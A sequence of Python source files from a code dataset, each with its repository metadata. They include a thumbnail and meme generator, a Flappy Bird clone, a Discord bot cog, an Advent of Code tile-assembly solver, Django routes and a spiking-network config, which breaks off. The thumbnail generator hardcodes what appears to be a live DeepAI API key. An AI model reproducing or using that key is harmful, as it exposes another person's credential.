\"\"\"\n def load(self, im,definer):\n \n if isinstance(im, str):\n im = Image.open(im)\n frames = []\n \n try:\n for i in count(1):\n frames.append(ImageTk.PhotoImage(im.copy()))\n im.seek(i)\n except EOFError:\n pass\n self.frames = cycle(frames)\n \n try:\n self.delay = im.info['duration']\n except:\n self.delay = 100\n \n if len(frames) == 1:\n self.config(image=next(self.frames))\n else:\n self.next_frame()\n \n def unload(self):\n self.config(image=None)\n self.frames = None\n \n def next_frame(self):\n if self.frames:\n self.config(image=next(self.frames))\n self.after(self.delay, self.next_frame)\n\nclass makingImage():\n def get_image(width, height):\n req = urlopen('https://picsum.photos/{}/{}'.format(width, height))\n arr = np.asarray(bytearray(req.read()), dtype=np.uint8)\n img = theEngine.imdecode(arr, -1) \n return img\n\n def crop_image(raw_img):\n global thumbnail_resolution\n #Crops the image to youtube thumbnail aspect ratio, centering the crop with the center of the image\n ideal_aspect_ratio = thumbnail_resolution[0] / thumbnail_resolution[1]\n\n orig_y = raw_img.shape[0]\n\n orig_x = raw_img.shape[1]\n\n aspect_ratio = round(orig_x / orig_y, 16)\n\n if aspect_ratio < ideal_aspect_ratio:\n print('Excess y pixels')\n new_y = int(orig_x / ideal_aspect_ratio)\n y_center = int(orig_y / 2)\n cropped_img = raw_img[y_center - int(new_y / 2):y_center + int(new_y / 2), 0:orig_x]\n\n elif aspect_ratio > ideal_aspect_ratio:\n 
print('Excess x pixels')\n new_x = int(orig_y * ideal_aspect_ratio)\n x_center = int(orig_x / 2)\n cropped_img = raw_img[0:orig_y, x_center - int(new_x / 2):x_center + int(new_x / 2)]\n else: \n print('Correct aspect ratio')\n cropped_img = raw_img\n\n print('New Res: ' + str(cropped_img.shape))\n print('Current Aspect Ratio: ' + str(cropped_img.shape[1] / cropped_img.shape[0]))\n cropped_img = theEngine.resize(cropped_img, thumbnail_resolution)\n\n return cropped_img\n\n\n def get_font_scale(text, width):\n for scale in reversed(range(0, 50, 1)):\n textSize = theEngine.getTextSize(text, fontFace=theEngine.FONT_HERSHEY_DUPLEX, fontScale=scale/10, thickness=1)\n new_width = textSize[0][0]\n if (new_width <= width):\n return scale/10, textSize[0][1]\n\n\n def generate_txt(raw_img, txt, circle_pos):\n x_length = raw_img.shape[1]\n txt_scale, txt_height = makingImage.get_font_scale(txt, x_length)\n if circle_pos[1] > raw_img.shape[0] / 2:\n pos = (0, txt_height + int(.07 * raw_img.shape[0]))\n else:\n pos = (0, + raw_img.shape[0] - int(.07 * raw_img.shape[0]))\n line_width = txt_scale * 3\n txted_img = theEngine.putText(raw_img, text, pos, theEngine.FONT_HERSHEY_DUPLEX, txt_scale, (0, 0 ,0), int(line_width * 4), theEngine.LINE_AA)\n txted_img = theEngine.putText(raw_img, text, pos, theEngine.FONT_HERSHEY_DUPLEX, txt_scale, (255, 255, 255), int(line_width), theEngine.LINE_AA)\n return txted_img\n\n def get_text(self):\n ender_list = ['', '!', '!!!', '?', '??', '!?', '!??', '..!', '...'] \n r = requests.post(\n \"https://api.deepai.org/api/text-generator\",\n files={\n 'text':'Kanye West fan account',\n },\n headers={'api-key': 'f55c37e9-7b66-48e2-9c76-041b3bf47c5d'}\n )\n raw_text = r.json()['output']\n print(raw_text)\n ender = ender_list[random.randint(0,len(ender_list) - 1)]\n words = raw_text.split(' ')\n word_count = random.randint(2,4)\n place_in_text = random.randint(0,len(words) - word_count)\n kept_words = []\n for word in range(place_in_text, place_in_text + word_count):\n kept_words.append(words[word].replace('\\n', ''))\n text = ' '.join(kept_words) + ender\n return text\n\n def get_kp(image):\n orb = theEngine.ORB_create()\n grayscale_image = theEngine.cvtColor(image, theEngine.COLOR_BGR2GRAY)\n kp = orb.detect(grayscale_image, None)\n kp, des = orb.compute(grayscale_image, kp)\n kp_locations = []\n for keypoint in kp:\n kp_locations.append((keypoint.pt[0], keypoint.pt[1]))\n return kp_locations\n\n def get_densest(points_list):\n points = np.array(points_list) #list of tuples with x and y value\n tree = spatial.KDTree(np.array(points))\n radius = 3.0\n neighbors = tree.query_ball_tree(tree, radius)\n neighbors_ordered = sorted(neighbors, key=len)\n dense_list = []\n for point in neighbors_ordered:\n dense_list.append(tuple(points[neighbors.index(point)]))\n return dense_list\n\n def draw_circle(image, position):\n radius = int(image.shape[1] / 10)\n thickness = int(image.shape[1] / 75)\n theEngine.circle(image, (int(position[0]), int(position[1])), radius, (0,0,255), thickness, lineType=theEngine.LINE_AA)\n return image\n\n \n def get_arrow_cords(image, circle_pos, circle_radius):\n closer_point_length = circle_radius + (.05 * image.shape[1])\n further_point_length = closer_point_length + (.3 * image.shape[1])\n angle = random.randint(0,360)\n print(angle)\n print(circle_pos)\n arrow_start = (int(circle_pos[0] + (further_point_length * np.sin(angle))),\n int(circle_pos[1] + (further_point_length * np.cos(angle))))\n arrow_stop = (int(circle_pos[0] + (closer_point_length * 
np.sin(angle))),\n int(circle_pos[1] + (closer_point_length * np.cos(angle))))\n return arrow_start, arrow_stop\n\n def draw_shapes(image, dense_list, numOfArrows):\n radius = int(image.shape[1] / 10)\n thickness = int(image.shape[1] / 75)\n arrows_drawn = 0\n temp_images = []\n while arrows_drawn < numOfArrows:\n image = theEngine.circle(image, (int(dense_list[arrows_drawn][0]), int(dense_list[arrows_drawn][1])), radius, (0,0,255), thickness, lineType=theEngine.LINE_AA)\n print('Drawn circle at:')\n print(dense_list[arrows_drawn])\n arrow_start = (-50, -50)\n while arrow_start[0] not in range(0, image.shape[1]) or arrow_start[1] not in range(image.shape[0]):\n arrow_start, arrow_stop = makingImage.get_arrow_cords(image, dense_list[arrows_drawn], radius)\n #image = theEngine.arrowedLine(image, arrow_start, arrow_stop, (0,0,255), int(image.shape[1] / 30), theEngine.LINE_AA, tipLength=(image.shape[1] / 2000))\n temp_images.append(theEngine.arrowedLine(image, arrow_start, arrow_stop, (0,0,255), int(image.shape[1] / 30), theEngine.LINE_AA, tipLength=(image.shape[1] / 2000)))\n \n arrows_drawn += 1\n iterate = len(temp_images)-1\n for i in range(iterate):\n currentItImage = image\n if i==0:\n currentItImage = temp_images[i]\n image = theEngine.bitwise_and(currentItImage,temp_images[1])\n if i>0:\n image = theEngine.bitwise_and(currentItImage,temp_images[i+1]) \n return image\n \n \n def runGIF(fileName,fileName2):\n lbl = ImageLabel(tab1)\n lbl2 = ImageLabel(tab1)\n lbl2.load(fileName2,False) \n lbl2.grid(row=0, column=3, pady=2)\n lbl.load(fileName,False)\n lbl.grid(row=0,column=1,pady=2)\n return\n \n def makeImage(self):\n \n makingImage.runGIF(\"frog_left.gif\",\"frog_right.gif\")\n print('working')\n global times\n global numOfArrows\n \n arrows = 1\n try:\n arrows = int(numOfArrows.get())\n except:\n print('')\n pass\n \n text = makingImage.get_text()\n saveBtn = Button (tab1, text = \"Save the Image Bro\", command = makingImage.saveFile, width = 20)\n saveBtn.grid(row=4,column=2,pady=2)\n if times >0:\n label.config(image='') \n saveBtn.destroy() \n label.grid(row=0, column=1, pady=2)\n \n img = makingImage.get_image(thumbnail_resolution[0], thumbnail_resolution[1])\n\n cropped_img = makingImage.crop_image(img)\n \n\n densest = makingImage.get_densest(makingImage.get_kp(cropped_img))\n print('Densest Point is at: ' + str(densest))\n circled_img = makingImage.draw_shapes(cropped_img, densest,arrows)\n \n \n x_length = circled_img.shape[1]\n txt_scale, txt_height = makingImage.get_font_scale(text, x_length)\n if densest[0][1] > circled_img.shape[0] / 2:\n pos = (0, txt_height + int(.07 * circled_img.shape[0]))\n else:\n pos = (0, + circled_img.shape[0] - int(.07 * circled_img.shape[0]))\n line_width = txt_scale * 3\n txted_img = theEngine.putText(circled_img, text, pos, theEngine.FONT_HERSHEY_DUPLEX, txt_scale, (0, 0 ,0), int(line_width * 4), theEngine.LINE_AA)\n txted_img = theEngine.putText(circled_img, text, pos, theEngine.FONT_HERSHEY_DUPLEX, txt_scale, (255, 255, 255), int(line_width), theEngine.LINE_AA)\n \n \n blue,green,red = theEngine.split(txted_img)\n firstStep = theEngine.merge((red,green,blue))\n secondStep= Image.fromarray(firstStep)\n global saveImage \n saveImage= secondStep\n imageFin = ImageTk.PhotoImage(image = secondStep)\n label.config(image=imageFin)\n \n label.grid(row=0, column=2, pady=2)\n times+=1\n tab1.config(bg='blue')\n btn.grid(row=5,column=2,pady=2)\n app.mainloop()\n \n \n def saveFile(self):\n filename = filedialog.asksaveasfile(mode='w', 
defaultextension=\".jpg\")\n global saveImage\n if not filename:\n return\n saveImage.save(filename)\n \n \n \n\nif __name__ == '__main__':\n \n btn = Button(tab1, text = \"Generate Da Meme\", command = makingImage.makeImage,width=20)\n btn.grid(row=4,column=2,pady=2)\n openBtn = Button(tab2,text = \"Upload Image\",command= userInput.gifTab2)\n openBtn.grid(row=6, column =2, pady=2)\n app.mainloop()\n\n\n\n\n\n\n\n \n\n\n","repo_name":"eeden2/YouTube-Thumbnail-Generator","sub_path":"Thumbnail.py","file_name":"Thumbnail.py","file_ext":"py","file_size_in_byte":16603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"5183221414","text":"import pygame\nfrom Sprites.background import Background\nfrom Sprites.bird import Bird\nfrom Sprites.ground import Ground\nfrom Sprites.pipe import Pipe\nfrom settings import BLACK, FPS, GAP, HEIGHT, WHITE, WIDTH\n\nclass Game:\n def __init__(self):\n # Setup\n pygame.init()\n self.surface = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption('Flappy Bird')\n self.clock = pygame.time.Clock()\n self.font = pygame.font.Font('assets/fonts/FB.woff', 50)\n\n # Sprites\n self.background = pygame.sprite.GroupSingle(Background())\n self.ground = pygame.sprite.GroupSingle(Ground())\n self.bird = pygame.sprite.GroupSingle(Bird())\n self.pipes = []\n self.scored_pipes = []\n\n self.pipes.append(Pipe(2 * WIDTH))\n\n # Helpers\n self.state = 'menu'\n self.started = False\n self.score = 0\n\n def draw_score(self):\n score = str(self.score)\n score_surface = self.font.render(score, False, WHITE, BLACK)\n self.surface.blit(score_surface, ((WIDTH - score_surface.get_width()) // 2, 20))\n\n def run(self):\n running = True\n while running:\n dt = self.clock.tick_busy_loop(FPS) / 1000\n\n self.background.draw(self.surface)\n\n\n if self.state == 'playing':\n for pipe in self.pipes:\n for bird in self.bird.sprites():\n if pipe.collide(bird):\n self.__init__()\n elif bird.rect.right >= pipe.bottom_rect.x + 20 and pipe not in self.scored_pipes:\n if bird.rect.top > 0:\n self.score += 1\n self.scored_pipes.append(pipe)\n else:\n self.__init__()\n pipe.update(dt, self.pipes)\n pipe.draw(self.surface)\n \n for pipe in self.pipes:\n if pipe.bottom_rect.x >= GAP - 2 and pipe.bottom_rect.x <= GAP:\n self.pipes.append(Pipe(WIDTH))\n break\n\n events = pygame.event.get()\n for event in events:\n if ((event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE) or (event.type == pygame.MOUSEBUTTONDOWN and pygame.mouse.get_pressed()[0])) and not self.started:\n self.started = True\n self.state = 'playing'\n if event.type == pygame.QUIT:\n running = False\n\n self.draw_score()\n\n self.ground.update(dt)\n self.bird.update(dt, self.state)\n \n self.ground.draw(self.surface)\n self.bird.draw(self.surface)\n\n if pygame.sprite.groupcollide(self.bird, self.ground, False, False):\n self.__init__()\n\n pygame.display.update()\n \n pygame.quit()\n\ndef main():\n game = Game()\n game.run()\n\nif __name__=='__main__':\n main()","repo_name":"CHAKHVA/flappy-bird-clone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"262442159","text":"class OwnError(Exception):\n def __init__(self, txt):\n self.txt = txt\n\n\nnum_input = []\n\nwhile True:\n num = input('Введите число: ')\n if num == 'stop':\n break\n try:\n if num.isdigit():\n num_input.append(int(num))\n else:\n raise OwnError(f'{num} не является числом!')\n except OwnError as err:\n print(err)\n\nprint(num_input)\n","repo_name":"stepankrylov/Home_Work_8","sub_path":"Home_Work_8(3).py","file_name":"Home_Work_8(3).py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"7262080484","text":"import discord\nfrom discord.ext import commands\nfrom pussybot import bot, PATCHNOTES\n\nclass General(commands.Cog):\n def __init__(self, bot): self.bot = bot\n \n @commands.command(name=\"ping\", brief=\"Ping the bot and get the latency\")\n async def ping(self, ctx): await ctx.send(f\"Pong! `{round(bot.latency * 1000)}ms`\")\n \n @commands.command(name=\"patchnotes\", brief=\"Get the latest patchnotes\")\n async def patchnotes(self, ctx): \n embed = discord.Embed(title=\"Patch notes\", description=f\"```ini\\n{PATCHNOTES}```\", color=0x8E72BE)\n await ctx.send(embed=embed)\n \ndef setup(bot): bot.add_cog(General(bot))","repo_name":"adenviney/pussybot","sub_path":"ext/General.py","file_name":"General.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"40009669561","text":"from biobb_common.tools import test_fixtures as fx\nfrom biobb_gromacs.gromacs.pdb2gmx import pdb2gmx\nimport pytest\n\n\nclass TestPdb2gmxSingularity:\n def setup_class(self):\n fx.test_setup(self, 'pdb2gmx_singularity')\n\n def teardown_class(self):\n # pass\n fx.test_teardown(self)\n\n @pytest.mark.skip(reason=\"singularity currently not available\")\n def test_pdb2gmx_singularity(self):\n returncode = pdb2gmx(properties=self.properties, **self.paths)\n assert fx.not_empty(self.paths['output_top_zip_path'])\n assert fx.equal(self.paths['output_top_zip_path'], self.paths['ref_output_top_zip_path'])\n assert fx.not_empty(self.paths['output_gro_path'])\n assert fx.equal(self.paths['output_gro_path'], self.paths['ref_output_gro_path'])\n assert fx.exe_success(returncode)\n","repo_name":"bioexcel/biobb_gromacs","sub_path":"biobb_gromacs/test/unitests/test_gromacs/test_pdb2gmx_singularity.py","file_name":"test_pdb2gmx_singularity.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"8026150777","text":"import doctest\nfrom collections import defaultdict, namedtuple\n\nTOP = 0\nRIGHT = 1\nBOTTOM = 2\nLEFT = 3\n\nPOSSIBLE_ROTATIONS = [(r, f) for f in [False, True] for r in range(4)]\n\nSNEK = \"\"\"\n # \n# ## ## ###\n # # # # # # \n\"\"\"[1:-1].split('\\n')\n\n\nclass Tile:\n def __init__(self):\n self.lines = []\n self.top = ''\n self.right = ''\n self.bottom = ''\n self.left = ''\n\n def add_line(self, line):\n self.lines.append(line)\n if not self.top:\n self.top = line\n self.left += line[0]\n self.right += line[-1]\n self.bottom = line\n\n def sides(self, rotate=0, flip=False):\n if flip:\n s = (self.top[::-1], self.left, self.bottom[::-1], self.right)\n else:\n s = (self.top, self.right, self.bottom, self.left)\n for _ in range(rotate):\n s = (s[LEFT][::-1], s[TOP], s[RIGHT][::-1], s[BOTTOM])\n return s\n\n\ndef flip_lines(lines: list[str]):\n \"\"\"\n >>> flip_lines(['ab', 'cd'])\n ['ba', 'dc']\n \"\"\"\n return [line[::-1] for line in lines]\n\n\ndef rotate_lines(lines: list[str], rotate):\n \"\"\"\n >>> rotate_lines(['ab', 'cd'], 1)\n ['ca', 'db']\n >>> rotate_lines(['abc', 'def'], 1)\n ['da', 'eb', 'fc']\n \"\"\"\n if rotate >= 2:\n rotate -= 2\n lines = [line[::-1] for line in reversed(lines)]\n if rotate >= 1:\n rotate -= 1\n lines = [''.join(lines[x][y] for x in range(len(lines)))[::-1] for y in range(len(lines[0]))]\n return lines\n\n\nclass Assignment(namedtuple('Assignment', ['tile', 'rotate', 'flip'])):\n def sides(self, tiles: dict[int, Tile]):\n return tiles[self.tile].sides(self.rotate, self.flip)\n\n def content(self, tiles: dict[int, Tile]):\n tile = tiles[self.tile]\n lines = [line[1:-1] for line in tile.lines[1:-1]]\n if self.flip:\n lines = flip_lines(lines)\n return rotate_lines(lines, self.rotate)\n\n\ndef categorize_tiles(tiles: dict[int, Tile]):\n options = defaultdict(set)\n for id, tile in tiles.items():\n for side in tile.sides():\n options[side].add(id)\n options[side[::-1]].add(id)\n\n outside = defaultdict(int)\n for ids in options.values():\n if len(ids) < 2:\n outside[next(iter(ids))] += 1\n\n corners = {id for id, n in outside.items() if n == 4}\n assert len(corners) == 4\n edges = {id for id, n in outside.items() if n == 2}\n assert len(edges) == 40\n middle = set(tiles.keys()) - corners - edges\n assert len(middle) == 100\n\n return options, corners, edges, middle\n\n\ndef part1(tiles: dict[int, Tile]):\n options, corners, edges, middle = categorize_tiles(tiles)\n print(corners)\n prod = 1\n for c in corners:\n prod *= c\n print(prod)\n\n\ndef part2(tiles: dict[int, Tile]):\n options, corners, edges, middle = categorize_tiles(tiles)\n\n def tile_options_at(k: complex):\n if k in (0, 11, 0 + 11j, 11 + 11j):\n return corners\n if k.real == 0 or k.real == 11 or k.imag == 0 or k.imag == 11:\n return edges\n return middle\n\n def assignment_options_at(board: dict[complex, Assignment], k: complex):\n possible_tiles = tile_options_at(k) - {a.tile for a in board.values()}\n required_top = None\n required_left = None\n if k.imag > 0:\n required_top = board[k - 1j].sides(tiles)[BOTTOM]\n possible_tiles &= options[required_top]\n if k.real > 0:\n required_left = board[k - 1].sides(tiles)[RIGHT]\n possible_tiles &= options[required_left]\n for tile in possible_tiles:\n for r, f in POSSIBLE_ROTATIONS:\n a = Assignment(tile, r, f)\n sides = a.sides(tiles)\n if required_top and sides[TOP] != required_top:\n continue\n if required_left and sides[LEFT] != required_left:\n continue\n yield a\n\n indexes = [x + y * 1j for y in range(12) 
for x in range(12)]\n\n def assign_all(board: dict[complex, Assignment], at: int):\n if at == len(indexes):\n return board\n k = indexes[at]\n for ao in assignment_options_at(board, k):\n new_board = board.copy()\n new_board[k] = ao\n result = assign_all(new_board, at + 1)\n if result:\n return result\n\n solved = assign_all(dict(), 0)\n content = dict()\n for k, a in solved.items():\n tile_content = a.content(tiles)\n assert len(tile_content) == 8\n for y, tile_row in enumerate(tile_content):\n for x, v in enumerate(tile_row):\n ck = (8 * k) + y * 1j + x\n content[ck] = v\n\n found = False\n for r, f in POSSIBLE_ROTATIONS:\n lines = SNEK\n if f:\n lines = flip_lines(lines)\n lines = rotate_lines(lines, r)\n snek = {x + y * 1j for y in range(len(lines)) for x in range(len(lines[0])) if lines[y][x] == '#'}\n\n for y in range(96):\n for x in range(96):\n if all(content.get(x + y * 1j + c, None) == '#' for c in snek):\n found = True\n for c in snek:\n content[x + y * 1j + c] = 'O'\n if found:\n break\n\n for y in range(96):\n print(''.join(content[x + y * 1j] for x in range(96)))\n print(sum(1 for v in content.values() if v == '#'))\n\n\ndef main():\n tiles = dict()\n with open('day20_input.txt') as file:\n for line in file:\n line = line.strip()\n if not line:\n pass\n elif line.startswith('Tile '):\n id = int(line[5:-1])\n tile = Tile()\n tiles[id] = tile\n else:\n tile.add_line(line)\n\n part1(tiles)\n part2(tiles)\n\n\nif __name__ == \"__main__\":\n doctest.testmod()\n main()\n","repo_name":"nigelzor/advent-of-code","sub_path":"2020/day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"29773417939","text":"from django.urls import path,include\nfrom django.contrib.auth.decorators import login_required\n\nfrom .views import *\n\napp_name = 'product'\n\nurlpatterns = [\n path('',login_required(ProductListView.as_view()),name='listing'), \n path('add/',login_required(ProductCreateView.as_view()),name='add'), \n path('stock/',login_required(StockListView.as_view()),name='stock_listing'), \n path('stock/add/',login_required(StockCreateView.as_view()),name='stock_add'), \n]\n\n ","repo_name":"kevtheprogrammer/sodakings","sub_path":"product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"35597714656","text":"import numpy as np\nimport os\n\nGENN = 'genn'\nSPINNAKER = 'spinnaker'\n\nDEBUG = bool(0)\nONE_TO_ONE_EXCEPTION = bool(0)\nBACKEND = 'SingleThreadedCPU' if bool(0) else 'CUDA'\n\nINF = float(10e10)\n\n#SEED = 7\nSEED = None\nRNG = np.random.RandomState(seed=SEED)\n\n\nUSE_GABOR_LAYER = bool(0)\n\nSIM_NAME = GENN\n\nif SIM_NAME == GENN:\n from pynn_genn.random import NativeRNG, NumpyRNG\n NP_RNG = NumpyRNG(seed=SEED)\n NATIVE_RNG = NativeRNG(NP_RNG, seed=SEED)\n\nelse:\n NP_RNG = RNG\n NATIVE_RNG = RNG\n\n\nGPU_ID = 0\nUSE_PROCEDURAL = bool(0)\n\nTIMESTEP = 0.10 #ms\nSAMPLE_DT = 50.0 #ms\nSAMPLE_OFFSET = 10. # ms\nSAMPLE_MAX_T = SAMPLE_OFFSET + 5. # ms\n# iw = 28\niw = 32\n# iw = 48\n# iw = 56\n# iw = 64\n# iw = 105\nINPUT_SHAPE = (iw, iw)\nINPUT_DIVS = (3, 5)\n# INPUT_DIVS = (3, 3)\n# INPUT_DIVS = (2, 2)\n# INPUT_DIVS = (1, 1)\n# INPUT_DIVS = (2, 3)\nN_CLASSES = 14 if DEBUG else 3\nN_SAMPLES = 14 if DEBUG else 14\nN_EPOCHS = 10 if DEBUG else 5\nN_TEST = 6 if DEBUG else 6\nTOTAL_SAMPLES = N_SAMPLES * N_EPOCHS + N_TEST\nDURATION = N_CLASSES * TOTAL_SAMPLES * SAMPLE_DT\nPROB_NOISE_SAMPLE = 0.0#5\nSTEPS = 1 if SIM_NAME == GENN else 100\n\n\nTEST_MUSHROOM = bool(0)\nGAIN_CONTROL = bool(1)\nINH_INPUT = bool(1)\nSUPERVISION = bool(1) and (not TEST_MUSHROOM) \n\nSUP_DELAY = 5 # ms\nSUP_DURATION = 15 # ms\nSUP_CORRECT_AMPLITUDE = 1. # nA ?\nSUP_WRONG_AMPLITUDE = -0.2 # nA ?\n\nKERNEL_W = 7\nN_INPUT_LAYERS = 4\nPAD = KERNEL_W//2\nPI_DIVS_RANGE = (6, 7) if DEBUG else (2, 7)\nSTRIDE_RANGE = (2, 3) if DEBUG else (1, KERNEL_W//2 + 1)\nOMEGA_RANGE = (0.5, 1.0)\n\nif ONE_TO_ONE_EXCEPTION:\n EXPANSION_RANGE = (1., 1.0000000000000000000001)\nelse:\n # EXPANSION_RANGE = (10., 10.0001) if DEBUG else (0.25, 11.0)\n EXPANSION_RANGE = (20., 21.0) if DEBUG else (10, )#(5, 40)\n\n\nEXP_PROB_RANGE = (0.5, 0.75000001) if DEBUG else (3,)# 65)#0.025, 0.25)\n\nMUSH_MAX = 3.2 #/ float(EXP_PROB_RANGE[0])\n\nif ONE_TO_ONE_EXCEPTION:\n MUSHROOM_WEIGHT_RANGE = (5.0, 5.0000000001)\nelse:\n MUSHROOM_WEIGHT_RANGE = (1.0, 5.0000001) if DEBUG else (1., MUSH_MAX)\n# MUSHROOM_WEIGHT_RANGE = (0.50, 0.500000001) if DEBUG else (0.05, 1.0)\n# MUSHROOM_WEIGHT_RANGE = (0.025, 0.02500001) if DEBUG else (0.05, 1.0) ### for (64,64)\n\nMAX_PRE_OUTPUT = 40000\n\nOUTPUT_PROB_RANGE = (0.5, 0.750000001) if DEBUG else (0.01, )#0.5)\n# OUT_WEIGHT_RANGE = (0.1, 0.100000001) if DEBUG else (1.0, 5.0)\nif ONE_TO_ONE_EXCEPTION:\n OUT_WEIGHT_RANGE = (0.1, 0.1000000001)\nelse:\n OUT_WEIGHT_RANGE = (2.0, 5.000000001) if DEBUG else (0.1, 1.2)# (0.01, 0.5)\n# OUT_WEIGHT_RANGE = (1.5, 1.500001) if DEBUG else (0.01, 0.5) ### 64x64\n\n\nA_PLUS = (0.1, 5.0000000001) if DEBUG else (0.001, 1.0)\nA_MINUS = (0.1, 1.000000001) if DEBUG else (0.001, 1.0)\nCONN_DIST = (5, 15) if DEBUG else (1,)# 16)#(1, 15)\n\n\nSTD_DEV = (3.0, 3.00000001) if DEBUG else (0.5, 5.0)\nDISPLACE = (0.0,)#01, 0.00100000001) if DEBUG else (0.0001, 0.1)\nMAX_DT = (80.0, 80.00000001) if DEBUG else (float(SAMPLE_DT), SAMPLE_DT*2.0)\nW_MIN_MULT = (0.0, 0.00000001) if DEBUG else (0.00, )#(-1, 1)\nW_MAX_MULT = (1.,)# 1.200000001) if DEBUG else (0.1, 2.0\n\n\nGABOR_WEIGHT_RANGE = (2.0, 5.000001) if DEBUG else (1.0, 5.0)\n\nGAIN_CONTROL_SIZE = 20\nGAIN_CONTROL_MIN_W = 0.\nGAIN_CONTROL_MAX_W = 0.250000000000008#0000#1\nGAIN_CONTROL_INH_W = -0.10000\nGAIN_CONTROL_CUTOFF = 15\n\n\nNOISE_MUSHROOM_SIZE = 20\nNOISE_MUSHROOM_RATE = 50\nNOISE_MUSHROOM_WEIGHT = 0.01\nNOISE_MUSHROOM_PROB = 0.0\n\n###############\n# if ONE_TO_ONE_EXCEPTION:\n# EXPANSION_RANGE = (1., 
1.0000000000000000000001)\n# else:\n# # EXPANSION_RANGE = (10., 10.0001) if DEBUG else (0.25, 11.0)\n# EXPANSION_RANGE = (0.25, 0.25) if DEBUG else (0.25, 11.0)\n#\n# EXP_PROB_RANGE = (0.15, 0.15000001) if DEBUG else (0.05, 0.3)\n# OUTPUT_PROB_RANGE = (0.15, 0.150000001) if DEBUG else (0.05, 0.3)\n# A_PLUS = (2.0, 2.0000000001) if DEBUG else (0.01, 5.0)\n# A_MINUS = (1.0, 1.000000001) if DEBUG else (0.001, 1.0)\n# STD_DEV = (3.0, 3.00000001) if DEBUG else (0.5, 5.0)\n# DISPLACE = (0.0,)#01, 0.00100000001) if DEBUG else (0.0001, 0.1)\n# MAX_DT = (80.0, 80.00000001) if DEBUG else (float(SAMPLE_DT), SAMPLE_DT*2.0)\n# W_MIN_MULT = (0.0, 0.00000001) if DEBUG else (-2.0, 0.0)\n# W_MAX_MULT = (1.2,)# 1.200000001) if DEBUG else (0.1, 2.0)\n# CONN_DIST = (10, 11) if DEBUG else (3, 25)\n#\n#\n# GABOR_WEIGHT_RANGE = (2.0, 2.000001) if DEBUG else (1.0, 5.0)\n#\n# # OUT_WEIGHT_RANGE = (0.1, 0.100000001) if DEBUG else (1.0, 5.0)\n# if ONE_TO_ONE_EXCEPTION:\n# OUT_WEIGHT_RANGE = (0.1, 0.1000000001)\n# else:\n# OUT_WEIGHT_RANGE = (2.0, 2.000000001) if DEBUG else (0.5, 5.0)\n# # OUT_WEIGHT_RANGE = (1.5, 1.500001) if DEBUG else (0.01, 0.5) ### 64x64\n#\n# if ONE_TO_ONE_EXCEPTION:\n# MUSHROOM_WEIGHT_RANGE = (5.0, 5.0000000001)\n# else:\n# MUSHROOM_WEIGHT_RANGE = (1.0, 1.0000001) if DEBUG else (1.0, 5.0)\n# # MUSHROOM_WEIGHT_RANGE = (0.50, 0.500000001) if DEBUG else (0.05, 1.0)\n# # MUSHROOM_WEIGHT_RANGE = (0.025, 0.02500001) if DEBUG else (0.05, 1.0) ### for (64,64)\n###############\n\n\n#################################################################\n# WEIGHTS FOR FITNESS #\n#################################################################\n\nif SUPERVISION:\n N_PER_CLASS = 1\nelse:\n N_PER_CLASS = 50\n\nOUTPUT_SIZE = N_CLASSES * N_PER_CLASS\nMAX_ACTIVE_PER_CLASS = int(OUTPUT_SIZE / 0.5)\nACTIVITY_THRESHOLD = 0.5 * OUTPUT_SIZE\nMAX_VECTOR_DIST = 100.0\nABOVE_THRESH_W = 1.0 / N_CLASSES\n\nTARGET_ACTIVITY_PER_SAMPLE = np.round(OUTPUT_SIZE * 0.05)\nTARGET_FREQUENCY_PER_OUTPUT_NEURON = np.round(N_TEST * 1.5)\n\nOVERLAP_WEIGHT = 0.3\nREPRESENTATION_WEIGHT = 0.4\nDIFFERENT_CLASS_DISTANCE_WEIGHT = 0.2\nSAME_CLASS_DISTANCE_WEIGHT = 0.\n\n\n# CONN_DIST = 3\n# CONN_DIST = 9\n# CONN_DIST = 15\n# CONN_ANGS = 9\n# CONN_RADII = [3, ]\n\n### static weights\n# gabor_weight = [1.0, 1.0, 2.0, 2.0]\n# mushroom_weight = 0.25\nINHIBITORY_WEIGHT = {\n 'gabor': -5.0,\n 'mushroom': -(0.5 if USE_PROCEDURAL else 0.5),\n 'output': -0.01,\n}\n\nN_INH_PER_ZONE = 3\n\nN_INH_OUTPUT = 5 # int( 0.25 * N_PER_CLASS * N_CLASSES )\n\nEXCITATORY_WEIGHT = {\n 'gabor': 3.0,\n 'mushroom': 5.0,\n 'output': 5.0,\n}\nMUSH_SELF_PROB = 0.0075\n\nATTRS = [\n 'out_weight',\n # 'n_pi_divs', 'stride', 'omega',\n 'expand', 'exp_prob', 'out_prob',\n 'mushroom_weight'\n]\n# ATTRS += ['gabor_weight-%d'%i for i in range(N_INPUT_LAYERS)]\n\nN_ATTRS = len(ATTRS)\n\nATTR2IDX = {attr: i for i, attr in enumerate(ATTRS)}\n\nATTR_RANGES = {\n 'out_weight': OUT_WEIGHT_RANGE,\n 'mushroom_weight': MUSHROOM_WEIGHT_RANGE,\n 'expand': EXPANSION_RANGE,\n 'exp_prob': EXP_PROB_RANGE,\n 'out_prob': OUTPUT_PROB_RANGE,\n 'conn_dist': CONN_DIST,\n\n 'A_plus': A_PLUS,\n 'A_minus': A_MINUS,\n # 'std': STD_DEV,\n # 'displace': DISPLACE,\n # 'maxDt': MAX_DT,\n 'w_max_mult': W_MAX_MULT,\n 'w_min_mult': W_MIN_MULT,\n\n}\nATTR_STEPS_DEVS = {\n 'out_weight': 1.0,\n 'mushroom_weight': 1.0,\n 'expand': 1.0,\n 